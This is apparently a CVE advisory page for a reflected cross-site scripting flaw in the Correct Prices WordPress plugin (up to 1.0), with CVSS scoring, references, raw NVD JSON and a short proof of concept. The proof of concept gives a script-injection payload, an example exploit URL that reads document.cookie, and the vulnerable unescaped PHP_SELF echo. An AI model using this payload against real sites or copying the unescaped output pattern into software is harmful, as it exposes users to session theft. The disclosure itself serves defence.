CVE-2026-8627

Description

The Correct Prices plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $_SERVER['PHP_SELF'] variable in versions up to and including 1.0. This is due to the correct_prices_page() function echoing $_SERVER['PHP_SELF'] into a form's action attribute without any input sanitization or output escaping (such as esc_url() or esc_attr()). Because PHP_SELF reflects attacker-controlled path-info appended to the script URL, an attacker can break out of the attribute and inject arbitrary markup. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a specially crafted link.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Correct Prices <= 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC Explanation:
// The vulnerability allows breaking out of the form action attribute.
// Payload structure: /"><script>alert(1)</script>
// Example URL:
// http://target-site.com/wp-content/plugins/correct-prices/correct_prices.php/"><script>alert(document.cookie)</script>
// 
// Vulnerable Code context:
// <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
// 
// Resulting HTML when exploited:
// <form action="/correct-prices/"><script>alert(document.cookie)</script>" method="post">

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8627
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8627
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8627/
[4] VulDB https://vuldb.com/cve/CVE-2026-8627
[5] https://plugins.trac.wordpress.org/browser/correct-prices/trunk/correct_prices.php#L134
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/605c6c53-6920-42ba-8784-b3a186bbf821?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8627", "sourceIdentifier": "[email protected]", "published": "2026-05-20T02:16:40.980", "lastModified": "2026-05-20T02:16:40.980", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Correct Prices plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $_SERVER['PHP_SELF'] variable in versions up to and including 1.0. This is due to the correct_prices_page() function echoing $_SERVER['PHP_SELF'] into a form's action attribute without any input sanitization or output escaping (such as esc_url() or esc_attr()). Because PHP_SELF reflects attacker-controlled path-info appended to the script URL, an attacker can break out of the attribute and inject arbitrary markup. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a specially crafted link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/correct-prices/trunk/correct_prices.php#L134", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/605c6c53-6920-42ba-8784-b3a186bbf821?source=cve", "source": "[email protected]"}]}}